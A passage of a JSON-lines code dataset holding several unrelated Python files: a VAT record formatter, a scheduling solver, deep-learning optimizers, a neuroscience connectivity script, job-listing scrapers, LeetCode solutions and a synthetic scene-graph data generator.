'seg_num4': '04',\n 'seg_num5': '05',\n 'flag': '0',\n 'zero4': ' '\n }\n self.post={'date_value_hdr': '000000', 'type_paiement': '0'}\n self.init_local_context()\n\n def init_local_context(self):\n \"\"\"\n Must instanciate a fields list, field = (name,size)\n and update a local_values dict.\n \"\"\"\n raise _('not implemented')\n\n def generate(self):\n res=''\n for field in self.fields :\n if self.pre.has_key(field[0]):\n value = self.pre[field[0]]\n elif self.global_values.has_key(field[0]):\n value = self.global_values[field[0]]\n elif self.post.has_key(field[0]):\n value = self.post[field[0]]\n else :\n pass\n try:\n res = res + c_ljust(value, field[1])\n except :\n pass\n return res\n\nclass record_df(record):\n def init_local_context(self):\n self.fields=[\n ('df', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('order_num', 6),\n ('certificate', 30),\n ('vat_order', 13),\n\n ('vat_order_date', 8),\n ('partner_vat', 13),\n ('partner', 40),\n ('invoice', 30),\n ('invoice_date', 8),\n ('amount_ht', 15),\n ('tax_amount', 15),\n ('start', 1),\n ('subject', 320),\n ('end', 2),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\nclass record_ef(record):\n def init_local_context(self):\n self.fields=[\n ('ef', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('company', 40),\n ('activity', 40),\n ('city', 40),\n ('street', 72),\n ('num', 4),\n ('zip', 4),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\nclass record_tf(record):\n def init_local_context(self):\n self.fields=[\n ('tf', 2),\n ('vat', 7),\n ('vat_id', 1),\n ('vat_cat', 1),\n ('vat_num', 3),\n ('fiscal_year', 4),\n ('period', 2),\n\n ('num_invoice', 6),\n ('reserved1', 142),\n ('total_ht', 15),\n ('total_tax', 15),\n ('newline', 1)\n ]\n self.pre.update( {\n 'newline': '\\r\\n',\n })\n\ndef tr(string_in):\n try:\n string_in= string_in.decode('utf-8')\n except:\n # If exception => then just take the string as is\n pass\n for k in TRANS:\n string_in = string_in.replace(k[0],k[1])\n try:\n res= string_in.encode('ascii','replace')\n except:\n res = string_in\n return res\n\n\n\n\n\n\n\ndef c_ljust(s, size):\n \"\"\"\n check before calling ljust\n \"\"\"\n s= s or ''\n if len(s) > size:\n s= s[:size]\n s = s.decode('utf-8').encode('latin1','replace').ljust(size)\n return s\n","sub_path":"wct_tn_accounting_11/models/purchase_record_set.py","file_name":"purchase_record_set.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"157762218","text":"from scheduling import get_schedule as gready_schedule\n\ndef get_time_of_schedule(sch, count_of_machines, count_of_jobs, list_of_weights):\n\ttimes = [0] * count_of_machines\n\tfor i in xrange(count_of_jobs):\n\t\ttimes[sch[i]] += list_of_weights[i]\n\treturn max(times)\n\nclass DFSSchedule:\n\tbest_schedule = None\n\tbest_schedule_time = float('+inf')\n\n\tdef construct_dfs_schedule(self, count_of_machines, count_of_jobs, list_of_weights, current_sch, number_of_job, max_time):\n\t\tif number_of_job == count_of_jobs:\n\t\t\ttime = get_time_of_schedule(current_sch, count_of_machines, count_of_jobs, list_of_weights)\n\t\t\tif time < self.best_schedule_time:\n\t\t\t\tself.best_schedule = current_sch[:]\n\t\t\t\tself.best_schedule_time = time\n\t\telse:\n\t\t\tfor m in xrange(0, count_of_machines):\n\t\t\t\tcurrent_sch[number_of_job] = m\n\t\t\t\tif get_time_of_schedule(current_sch, count_of_machines, number_of_job + 1, list_of_weights) > max_time:\n\t\t\t\t\tcontinue\n\t\t\t\tself.construct_dfs_schedule(count_of_machines, count_of_jobs, list_of_weights, current_sch, number_of_job + 1, max_time)\n\ndef get_schedule(count_of_machines, count_of_jobs, list_of_weights):\n\tsch = gready_schedule(count_of_machines, count_of_jobs, list_of_weights)\n\tb_max = get_time_of_schedule(sch, count_of_machines, count_of_jobs, list_of_weights)\n\tbest_schedule = None\n\tbest_schedule_time = float('+inf')\n\tconstructor = DFSSchedule()\n\tconstructor.construct_dfs_schedule(count_of_machines, count_of_jobs, list_of_weights, [0] * count_of_jobs, 0, b_max)\n\treturn constructor.best_schedule\n\nif __name__ == \"__main__\":\n\tfrom sys import stdin\n\n\tprint(\"Enter count of machines: \")\n\tcount_of_machines = int(stdin.readline())\n\tprint(\"Enter count of jobs: \")\n\tcount_of_jobs = int(stdin.readline())\n\tprint(\"Enter weights of jobs:\")\n\tlist_of_weights = map(lambda x: int(x), stdin.readline().split(' '))\n\t\n\tprint(\" \".join(map(lambda x: str(x), get_schedule(count_of_machines, count_of_jobs, list_of_weights))))","sub_path":"pseudo_accurate.py","file_name":"pseudo_accurate.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"553622110","text":"import numpy as np\nfrom nanograd.tensor import Tensor\n\n\nclass Optimizer:\n \"\"\"Base class for optimizers\"\"\"\n def __init__(self, params:list):\n \"\"\"\n Initializer of the Optimizer class\n\n Args:\n params (list of Tensors)\n \"\"\"\n self.params = list(params)\n self.state = []\n \n def step(self):\n \"\"\"Update rule\"\"\"\n raise NotImplementedError(\"Should be implemented in subclasses of Optimizer\")\n\n def reset(self):\n \"\"\"Resets all hyperparameters\"\"\"\n raise NotImplementedError(\"Should be implemented in subclasses of Optimizer\")\n\n def zero_grad(self):\n \"\"\"\n Resets gradients of the parameters \n to zero. \n\n For gradient accumulation, in the training loop, call zero_grad() every\n n (usually 2 or 3) batches\n \"\"\"\n for param in self.params:\n param.grad = None\n\n\nclass SGD(Optimizer):\n \"\"\"Implementation of Stochastic Gradient Descent (SGD)\n \n Args:\n params (list of Tensors): parameters to be updated\n lr (float): learning rate\n momentum (float): Nesterov momentum\n \"\"\"\n def __init__(self, params:list, lr:float=1e-3, momentum:float=0) -> None:\n super(SGD, self).__init__(params)\n assert momentum >= 0.0, \"Momentum can't be negative\"\n\n self.lr, self.momentum = lr, momentum\n self.momentums = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n\n def step(self) -> None:\n for i, p in enumerate(self.params):\n self.momentums[i] = self.momentums[i] * self.momentum + self.lr * p.grad\n p.data = (p - self.momentums[i]).data \n\n\nclass Adam(Optimizer):\n \"\"\"Implementation of Adam\n \n Args:\n lr (float): learning rate\n beta1 (float): smoothing factor for first moment of the gradient\n beta2 (float): smoothing factor for second moment of the gradient\n eps (float): avoid division by zero\n \"\"\"\n def __init__(self, params:list, lr:float=1e-3, beta1:float=0.9, \n beta2:float=0.999, eps:float=1e-8) -> None:\n super(Adam, self).__init__(params)\n assert (0 <= beta1) and (beta1 < 1), \"Smoothing factor must be in [0,1)\"\n assert (0 <= beta2) and (beta2 < 1), \"Smoothing factor must be in [0,1)\"\n\n self.lr, self.beta1, self.beta2, self.eps = lr, beta1, beta2, eps\n self.t = 0\n\n self.exp_avg = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n self.exp_avg_sq = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n \n def step(self) -> None:\n self.t += 1\n\n for i, p in enumerate(self.params):\n self.exp_avg[i] = self.beta1 * self.exp_avg[i] + (1. - self.beta1) * p.grad\n self.exp_avg_sq[i] = self.beta2 * self.exp_avg_sq[i] + (1. - self.beta2) * (p.grad ** 2)\n\n bias_correction1 = self.exp_avg[i] / (1. - (self.beta1 ** self.t)) \n bias_correction2 = self.exp_avg_sq[i] / (1. - (self.beta2 ** self.t))\n\n p.data = (p - self.lr * bias_correction1 / (bias_correction2.sqrt() + self.eps)).data\n\n\nclass AdamW(Optimizer):\n \"\"\"Implementation of AdamW: Adam with enhanced weight decay\n\n Args:\n lr (float): learning rate\n weight_decay (float): L2-regularization parameter\n beta1 (float): smoothing factor for first moment of the gradient\n beta2 (float): smoothing factor for second moment of the gradient\n eps (float): avoid division by zero\n \"\"\"\n def __init__(self, params:list, lr:float=1e-3, weight_decay:float=1e-2, \n beta1:float=0.9, beta2:float=0.999, eps:float=1e-8) -> None:\n super(AdamW, self).__init__(params)\n assert (0 <= beta1) and (beta1 < 1), \"Smoothing factor must be in [0,1)\"\n assert (0 <= beta2) and (beta2 < 1), \"Smoothing factor must be in [0,1)\"\n\n self.lr, self.weight_decay, self.eps = lr, weight_decay, eps\n self.beta1, self.beta2 = beta1, beta2\n self.t = 0\n\n self.exp_avg = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params]\n self.exp_avg_sq = [Tensor.zeros(p.shape, device=self.params[0].device) for p in self.params] \n\n def step(self):\n self.t += 1\n\n for i, p in enumerate(self.params):\n bias_correction1 = 1 - self.beta1 ** self.t\n bias_correction2 = 1 - self.beta2 ** self.t\n\n self.exp_avg[i] = self.beta1 * self.exp_avg[i] + (1. - self.beta1) * p.grad\n self.exp_avg_sq[i] = self.beta2 * self.exp_avg_sq[i] + (1. - self.beta2) * (p.grad ** 2)\n\n denom = (self.exp_avg_sq[i] / bias_correction2).sqrt() + self.eps\n step_size = self.lr / bias_correction1\n\n p.data = (p * (1 - self.lr * self.weight_decay) - step_size * (self.exp_avg[i] / denom)).data","sub_path":"build/lib/nanograd/optim/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"635498165","text":"\"\"\"Compute static functional connectivity.\n\nRecommanded\n-----------\n#PBS -l walltime=6:00:00\n#PBS -N compute_dfc\n#PBS -l nodes=4:ppn=16\npython ~/toolbox/research/DMN-corr/xx_server/compute_dfc.py\n\"\"\"\nimport os\nimport shutil\n\nimport numpy as np\nfrom joblib import Memory\n\nfrom brainpipe.system import Study\nfrom brainpipe.connectivity import dfc, get_pairs\n\nif __name__ == '__main__':\n\n ###########################################################################\n cond = ('gamma50-150')\n win = 10.\n overlap = .5\n measures = ['corr', 'mtd', 'cmi']\n ###########################################################################\n\n st = Study('DMN-CORR')\n\n # Path :\n amp_files = st.search(*cond, folder='feature/amp', full_path=False)\n save_to = st.path_to_folder('dfc')\n suj_conf = st.load_config('DMN_SUBJECTS.json')\n kw = dict(verbose=False, win_opt='hamming', overlap=overlap)\n\n # Cache configuration :\n cache_dir = st.path_to_folder('cache/dfc')\n memory = Memory(cachedir=cache_dir, verbose=0)\n\n for f in amp_files:\n print('--------------------------------------------------------------')\n print('-> Processing %s' % f)\n print('--------------------------------------------------------------')\n suj = f.split('_')[0]\n sf = suj_conf[suj]['info']['sf']\n assert sf == 512\n\n # Load amplitude :\n print('-> Load file %s' % f)\n amp = st.load(f, folder='feature/amp')\n n_chans, n_time, n_sessions = amp.shape\n pairs = get_pairs(n_chans, as_array=True)\n n_pairs = pairs.shape[0]\n\n # Get the number of windows :\n n_win = len(dfc(amp[0, :, 0], amp[0, :, 0], win, sf=sf, **kw)[0])\n\n # Define dfc function :\n @memory.cache\n def _dfc(meth, i, amp_file):\n print(' * Compute pair %i/%i' % (i + 1, n_pairs), end='\\r')\n r, c = pairs[i, :]\n ts_1, ts_2 = amp[r, ...], amp[c, ...]\n return dfc(ts_1, ts_2, win, sf=sf, axis=0, measure=meth, **kw)\n\n # Loop over dfc methods :\n for m in measures:\n # Save file :\n save_as = f.replace('.npy', '_dfc-%s_win-%ir%i.npz' % (m, win, int(overlap * 100))) # noqa\n full_path = os.path.join(save_to, save_as)\n if os.path.isfile(full_path):\n print('======== %s ALREADY COMPUTED ========' % save_as)\n continue\n print(' -> File will be saved as %s' % save_as)\n\n print(' -> Compute %s dfc measure' % m)\n connect = np.zeros((n_chans, n_chans, n_win, n_sessions), dtype=float) # noqa\n pval = np.zeros_like(connect)\n for i, (r, c) in enumerate(pairs):\n _connect, _pval, time = _dfc(m, i, f)\n connect[r, c, ...] = _connect\n pval[r, c, ...] = _pval\n\n # Save file :\n print(' -> Save file %s' % full_path)\n np.savez(full_path, connect=connect, pval=pval, time=time)\n\n # Remove cache folder :\n print('-> Remove cache folder')\n shutil.rmtree(cache_dir, ignore_errors=True)\n","sub_path":"DMN-corr/_xx_server/compute_dfc.py","file_name":"compute_dfc.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645333754","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\ndef getCareerBlissJobs():\n sock = urllib.request.urlopen(\"https://www.careerbliss.com/search/?q=Healthcare%20Assistant&l=&typeFilter=job&sf=true\")\n htmlSource = sock.read() \n sock.close() \n output = []\n soup = BeautifulSoup(htmlSource) \n nextli = True\n while nextli:\n jobs = soup.find(id='bodyContainer').find(\"div\").find(\"div\").find_all(\"div\")[2].find_all(\"div\")[2].find_all(\"div\")[1].find(\"div\")\n print(jobs)\n return \"Cant access data\"\n\ndef getZippiaJobs():\n sock = urllib.request.urlopen(\"https://www.zippia.com/arizona-city-az-jobs/\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n output = []\n jobs = soup.find(\"zp-card-proxy\")\n print(jobs)\n return \"nothing found\"\n\ndef getJobxoomJobs():\n sock = urllib.request.urlopen(\"http://www.jobxoom.com/jobfind.php?action=search&auth_sess=llpvl5oprgnsimc38ugp3mbjk3&ref=34eb2b5cddb8fecdaaa06c6c9&kwd=hea&city=&jids%5B%5D=83#.XiHKicj7Q2w\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n jobs = soup.find(id='idjobsearchresults').find_all(\"div\")\n output = []\n nexturl = True\n while nexturl:\n for job in jobs:\n try:\n clas = job[\"class\"]\n if \"results\" in clas:\n h = job.find(\"a\", href=True)[\"href\"]\n j = job.find(\"a\").getText().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n k = job.find_all(\"p\", attrs={\"class\":\"desc\"})[-1].getText().replace(\"Employer/Recuiter:\",\"\").strip().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n desc = job.find(\"p\", attrs={\"class\":\"desc1\"}).getText().replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n logo = \"\"\n try:\n state = k.split(\" - \")[1]\n city = k.split(\" - \")[2]\n country = k.split(\" - \")[3]\n k = k.split(\" - \")[0].replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n except:\n state = \"\"\n city = \"\"\n country = \"\"\n k = \"\"\n start = job.find(\"span\", attrs={\"class\":\"posted\"}).getText().replace(\"Posted on: \", \"\").replace(\"\\n\", \"\").replace(\"\\t\", \"\")\n end = \"\"\n output.append({\"link\":h, \"name\":j, \"organization\":k, \"desc\":desc, \"logo\":logo, \"country\":country, \"state\":state, \"city\":city, \"start\":start, \"end\":end})\n except Exception as e:\n print(e)\n continue\n nexturl = soup.find_all(\"li\", attrs={\"class\":\"nolist\"})[-1].find(\"a\", href=True)[\"href\"]\n try:\n sock = urllib.request.urlopen(nexturl)\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n jobs = soup.find(id='idjobsearchresults').find_all(\"div\")\n except:\n nexturl = None\n return output\n\n\ndef getJobvertiseJobs():\n sock = urllib.request.urlopen(\"http://www.jobvertise.com/jobs/search?query=care&city=&radius=30&state=AZ&button=Search+Jobs\")\n htmlSource = sock.read() \n sock.close()\n soup = BeautifulSoup(htmlSource)\n output = []\n try:\n jobs = soup.find(\"body\").find_all(\"center\")[15].find(\"table\").find_all(\"table\")\n except:\n jobs = soup.find(\"body\").find_all(\"center\")[16].find(\"table\").find_all(\"table\")\n for job in jobs:\n try:\n j = job.find(\"span\").getText()\n h = job.find(\"a\", href=True)[\"href\"]\n k1 = job.find_all(\"tr\")[0].find_all(\"span\")[2]\n k1 = str(k1).split(\"
    \")\n desc = \"\"\n logo = \"\"\n state = k1[0].split(\" \")[-1]\n city = k1[0].split(\" \")[-2].strip(\",\").split(\">\")[-1]\n k = \"\"\n if \"Company Name:\" not in k1[1]:\n desc = k1[1]\n else:\n desc = \"Position\"+k[1].split(\"Position\")[1]\n k = k1[1].split(\"Position\")[0].replace(\"Company Name:\", \"\")\n country = \"US\"\n start = k1[-1].split(\"<\")[0]\n end = \"\"\n print(h)\n output.append({\"link\":h, \"name\":j, \"organization\":k, \"desc\":desc, \"logo\":logo, \"country\":country, \"state\":state, \"city\":city, \"start\":start, \"end\":end})\n except Exception as e:\n print(e)\n continue\n return output\n","sub_path":"flask-marketplace/marketplace/app/scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204810548","text":"# APPROACH - 1: (MY APPROACH) DIDN'T WORK \n# Time Complexity : O(max(s log s, t log t)) - s is the length of s ad t is the length of t, sort function is used\n# Space Complexity : O(1) as the length of both the hashmaps is constant (max : 26)\n# Did this code successfully run on Leetcode : NO\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. first checked if the length of both strings are equal or not\n# 2. Build two dicts one for s and other for t - to store the count of unique chars\n# 3. Then check whether the length of both dicts are same\n# 4. Then check if the sorted values of both dicts are same\n# 5. PROBLEM: Doesn't preserve the order of letters - eg:- aba, baa which my algo will pass but they are not isomorphic.\n\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n \n if len(s) == 0 and len(t) == 0:\n return True\n \n elif (not s or not t) or (len(s) != len(t)):\n return False\n \n hash_s = defaultdict(int)\n for char in s:\n hash_s[char] += 1\n \n hash_t = defaultdict(int)\n for char in t:\n hash_t[char] += 1\n \n # Check whether number of unique chars is same or not\n if len(hash_s) != len(hash_t):\n return False\n \n else:\n if list(hash_s.values()).sort() == list(hash_t.values()).sort():\n return True\n \n else:\n return False\n \n \n \n \n \n# APPROACH - 2: CORRECT APPROACH \n# Time Complexity : O(s) or O(t) - s is the length of s ad t is the length of t and to be a valid case to check, s == t.\n# Space Complexity : O(1) as the length of both the hashmaps is constant (max : 26)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. first checked if the length of both strings are equal or not\n# 2. Build two dicts one for s and other for t - to store correspondence (1-1 mappping)\n# 3. Go through two lists and check if char is in hashmap or not -> YES: check if the mapping is same as the current letter of other string -> YES: proceed further\n# -> NO: return False\n# -> NO: create an entry and store the mapping. \n# 4. Do for both the hashmap as we need 1-1 correspondence from both string's side. \n \nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n \n if len(s) == 0 and len(t) == 0:\n return True\n \n elif (not s or not t) or (len(s) != len(t)):\n return False\n \n hash_s, hash_t = {}, {}\n for ind in range(len(s)):\n \n if s[ind] in hash_s and hash_s[s[ind]] != t[ind]:\n return False\n \n elif s[ind] not in hash_s:\n hash_s[s[ind]] = t[ind]\n \n \n if t[ind] in hash_t and hash_t[t[ind]] != s[ind]:\n return False\n \n elif t[ind] not in hash_t:\n hash_t[t[ind]] = s[ind]\n \n return True\n \n \n","sub_path":"Problem-2_Isomorphic_string.py","file_name":"Problem-2_Isomorphic_string.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"180509339","text":"import networkx as nx\nimport numpy as np\nimport copy\nimport pickle as pkl\nimport random\nfrom argparse import ArgumentParser\nimport os\n\ndef print_stats(msg,num_nodes,num_edges,degrees,num_components,node_labels,edge_labels):\n global counter\n counter += 1\n print(msg)\n print(\"Nodes info: total = \", np.sum(num_nodes), \", average = \", np.sum(num_nodes) / len(num_nodes),\n \", (min,max) = (\", np.min(num_nodes), np.max(num_nodes), \") variance =\", np.var(num_nodes))\n print(\"Edges info: total = \", np.sum(num_edges), \", average = \", np.sum(num_edges) / len(num_edges),\n \", (min,max) = (\", np.min(num_edges), np.max(num_edges), \") variance =\", np.var(num_edges))\n print(\"degrees info: average = \", np.sum(degrees) / len(degrees),\n \", (min,max) = (\", np.min(degrees), np.max(degrees), \") variance =\", np.var(degrees))\n print(\"Label space info : node_label_space \", len(node_labels), \" edge_label_space \", len(edge_labels))\n #print(\"components info: average = \", np.sum(num_components) / len(num_components), \", (min,max) = (\",\n # np.min(num_components), np.max(num_components), \") variance =\", np.var(num_components))\n return\n\ndef stats_helper(graphs):\n print(\"num graphs = \",len(graphs))\n num_edges = []\n num_nodes = []\n degrees = []\n num_components = []\n node_labels = set()\n edge_labels = set()\n iter = 0\n for g in graphs:\n iter += 1\n #print(iter,len(node_labels))\n num_edges.append(g.number_of_edges())\n num_nodes.append(g.number_of_nodes())\n for u in list(g.nodes):\n degrees.append(g.degree[u])\n node_labels.add(g.nodes[u]['label'])\n for e in list(g.edges):\n edge_labels.add(g[e[0]][e[1]]['label'])\n num_components.append(nx.number_connected_components(g))\n #if iter%30000 == 0:\n # print_stats(iter/30000,num_nodes,num_edges,degrees,num_components,node_labels,edge_labels)\n #print(edge_labels[0:100])\n #print(edge_labels)\n print_stats(\"finish\",num_nodes, num_edges, degrees, num_components,node_labels,edge_labels)\n return\n\n\ndef compute_all_relationships(graph,eps = 0.2):\n directions = {\n \"front\": [0.754490315914154,-0.6563112735748291,-0.0],\n \"below\": [-0.0,-0.0,-1.0],\n \"behind\": [-0.754490315914154,0.6563112735748291,0.0],\n \"left\": [-0.6563112735748291,-0.7544902563095093,0.0],\n \"right\": [0.6563112735748291,0.7544902563095093,-0.0],\n \"above\": [0.0,0.0,1.0]\n }\n name_to_idx = {\n \"front\":0,\n \"behind\":1,\n \"left\":2,\n \"right\":3,\n }\n all_relationships = {}\n for name, direction_vec in directions.items():\n if name == 'above' or name == 'below': continue\n all_relationships[name] = []\n for i in range(graph.number_of_nodes()):\n coords1 = graph.nodes[i]['pos']\n for j in range(graph.number_of_nodes()):\n if j == i:\n continue\n coords2 = graph.nodes[j]['pos']\n diff = [coords2[k] - coords1[k] for k in [0, 1, 2]]\n dot = sum(diff[k] * direction_vec[k] for k in [0, 1, 2])\n if dot > eps:\n if graph.has_edge(i,j):\n graph[i][j]['label'][name_to_idx[name]] = 1\n else :\n graph.add_edge(i,j,label = np.zeros(4))\n graph[i][j]['label'][name_to_idx[name]] = 1\n\n return graph\n\ndef corpus_gen(params):\n colors ={\n \"gray\": [87, 87, 87],\n \"red\": [173, 35, 35],\n \"blue\": [42, 75, 215],\n \"green\": [29, 105, 20],\n \"brown\": [129, 74, 25],\n \"purple\": [129, 38, 192],\n \"cyan\": [41, 208, 208],\n \"yellow\": [255, 238, 51]\n }\n colors_list = [\"gray\",\"red\",\"blue\",\"green\",\"brown\",\"purple\",\"cyan\",\"yellow\"]\n query_graphs = []\n corpus_graphs = []\n for k in range(0,params['num_queries']):\n q = nx.Graph()\n for u in range(0,params['max_query_nodes']):\n # label will be a feature vector 3 for shape, 1 hot encoded next 3 for colors , next 2 for materials, next 1 for size\n shape_id = np.random.randint(0,3)\n material_id = np.random.randint(6,8)\n size = np.random.randint(0,2)\n size = 0.35*(1+size)\n label_ = np.zeros(9)\n label_[shape_id] = 1\n label_[material_id] = 1\n label_[8] = size\n label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0,len(colors_list))]])/256\n x = np.random.uniform(-3,3)\n y = np.random.uniform(-3,3)\n r = size\n q.add_node(u,label = label_, pos= (x,y,r))\n query_graphs.append(compute_all_relationships(q))\n corpus = []\n for _ in range(params['pos_corpus_per_query']):\n c = copy.deepcopy(q)\n for u in range(0,params['max_corpus_nodes']-params['max_query_nodes']):\n # label will be a feature vector 3 for shape, 1 hot encoded next 3 for colors , next 2 for materials, next 1 for size\n shape_id = np.random.randint(0, 3)\n material_id = np.random.randint(6, 8)\n size = np.random.randint(0, 2)\n size = 0.35*(1 + size)\n label_ = np.zeros(9)\n label_[shape_id] = 1\n label_[material_id] = 1\n label_[8] = size\n label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0, len(colors_list))]]) / 256\n x = np.random.uniform(-3, 3)\n y = np.random.uniform(-3, 3)\n r = size\n c.add_node(u+params['max_query_nodes'],label=label_, pos=(x, y, r))\n c = compute_all_relationships(c)\n corpus.append(c)\n corpus_graphs.append(corpus)\n return query_graphs,corpus_graphs\n\ndef add_noise(x,s):\n x+=np.random.normal(0,s)\n x = min(1.0,x)\n x = max(0,x)\n return x\n\ndef noisy_corpus(queries,corpus,params):\n s = params['noise']\n for q in queries:\n for u in range(q.number_of_nodes()):\n label_ = q.nodes[u]['label']\n label_[3] = add_noise(label_[3],s)\n label_[4] = add_noise(label_[4],s)\n label_[5] = add_noise(label_[4],s)\n label_[8] = add_noise(label_[8],s)\n q.nodes[u]['label'] = label_\n\n for corpus_list in corpus:\n for q in corpus_list:\n for u in range(q.number_of_nodes()):\n label_ = q.nodes[u]['label']\n label_[3] = add_noise(label_[3], s)\n label_[4] = add_noise(label_[4], s)\n label_[5] = add_noise(label_[4], s)\n label_[8] = add_noise(label_[8], s)\n q.nodes[u]['label'] = label_\n\n return queries,corpus\n\ndef complete_corpus(params,pos_corpus):\n corpus = []\n\n for i in range(params['num_queries']):\n corpus_list = pos_corpus[i]\n for j in range(0,params['total_corpus_per_query']-params['pos_corpus_per_query']):\n q = i\n while q == i:\n q = np.random.randint(0,params['num_queries'])\n k = np.random.randint(0,params['pos_corpus_per_query'])\n corpus_list.append(pos_corpus[q][k])\n corpus.append(corpus_list)\n\n return corpus\n\ndef check(query_graphs,train_corpus,params):\n print(\"Now checking the data\")\n #params, , , test_corpus, validation_corpus, train_labels, test_labels, validation_labels = data\n\n for g in query_graphs:\n if g.number_of_nodes() != params['max_query_nodes']:\n print(\"Error 1\")\n nodes = list(g.nodes)\n #print(nodes)\n if (0 not in nodes) or (1 not in nodes) or (2 not in nodes) or (3 not in nodes) or (4 not in nodes):\n print(\"Error 2\")\n for node in nodes:\n label_ = g.nodes[node]['label']\n if len(label_)!=9:\n print(\"Error 89\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 3\")\n for node2 in nodes:\n if g.has_edge(node,node2):\n label_= g.edges[node,node2]['label']\n if len(label_) != 4:\n print(\"Error 79\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 4\")\n A = nx.to_numpy_matrix(g)\n for u in nodes:\n for v in nodes:\n if g.has_edge(u,v):\n A[u,v] = np.sum(g.edges[u,v]['label'])\n if not nx.is_connected(g):\n print(\"Error disconnected\")\n\n print(\"query graphs are ok\")\n for i in range(len(query_graphs)):\n for g in train_corpus[i]:\n if g.number_of_nodes() != params['max_corpus_nodes']:\n print(\"Error 1\")\n nodes = list(g.nodes)\n for i in range(0,params['max_corpus_nodes']):\n if i not in nodes:\n print(\"Error 2\")\n #if (0 not in nodes) or (1 not in nodes) or (2 not in nodes) or (3 not in nodes) or (4 not in nodes):\n\n for node in nodes:\n label_ = g.nodes[node]['label']\n if len(label_) != 9:\n print(\"Error 89\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 3\")\n for node2 in nodes:\n if g.has_edge(node, node2):\n label_ = g.edges[node, node2]['label']\n if len(label_) != 4:\n print(\"Error 79\")\n for l in label_:\n if l < 0 or l > 1:\n print(\"Error 4\")\n A = nx.to_numpy_matrix(g)\n for u in nodes:\n for v in nodes:\n if g.has_edge(u, v):\n A[u, v] = np.sum(g.edges[u, v]['label'])\n if not nx.is_connected(g):\n print(\"Error disconnected\")\n\n\ndef test_corpus_gen(train_queries,params):\n colors = {\n \"gray\": [87, 87, 87],\n \"red\": [173, 35, 35],\n \"blue\": [42, 75, 215],\n \"green\": [29, 105, 20],\n \"brown\": [129, 74, 25],\n \"purple\": [129, 38, 192],\n \"cyan\": [41, 208, 208],\n \"yellow\": [255, 238, 51]\n }\n colors_list = [\"gray\", \"red\", \"blue\", \"green\", \"brown\", \"purple\", \"cyan\", \"yellow\"]\n corpus_graphs = []\n for q in train_queries:\n corpus = []\n for _ in range(params['pos_corpus_per_query']):\n c = copy.deepcopy(q)\n for u in range(0, params['max_corpus_nodes'] - params['max_query_nodes']):\n # label will be a feature vector 3 for shape, 1 hot encoded next 3 for colors , next 2 for materials, next 1 for size\n shape_id = np.random.randint(0, 3)\n material_id = np.random.randint(6, 8)\n size = np.random.randint(0, 2)\n size = 0.35 * (1 + size)\n label_ = np.zeros(9)\n label_[shape_id] = 1\n label_[material_id] = 1\n label_[8] = size\n label_[3:6] = np.asarray(colors[colors_list[np.random.randint(0, len(colors_list))]]) / 256\n x = np.random.uniform(-3, 3)\n y = np.random.uniform(-3, 3)\n r = size\n c.add_node(u + params['max_query_nodes'], label=label_, pos=(x, y, r))\n c = compute_all_relationships(c)\n corpus.append(c)\n corpus_graphs.append(corpus)\n return corpus_graphs\n\ndef noisy_data_gen(params):\n train_queries,pos_train_corpus = corpus_gen(params)\n pos_test_corpus = test_corpus_gen(train_queries,params)\n pos_val_corpus = test_corpus_gen(train_queries,params)\n\n\n train_corpus = complete_corpus(params,pos_train_corpus)\n test_corpus = complete_corpus(params,pos_test_corpus)\n val_corpus = complete_corpus(params,pos_val_corpus)\n check(train_queries,train_corpus,params)\n check(train_queries, test_corpus, params)\n check(train_queries, val_corpus, params)\n _,pos_test_corpus = noisy_corpus([],val_corpus,params)\n train_queries, train_corpus = noisy_corpus(train_queries, train_corpus, params)\n _, test_corpus = noisy_corpus([], test_corpus, params)\n _, val_corpus = noisy_corpus([], val_corpus, params)\n\n labels = np.zeros((params['num_queries'],params['total_corpus_per_query']))\n for i in range(params['num_queries']):\n for j in range(0,params['pos_corpus_per_query']):\n labels[i][j] = 1\n for j in 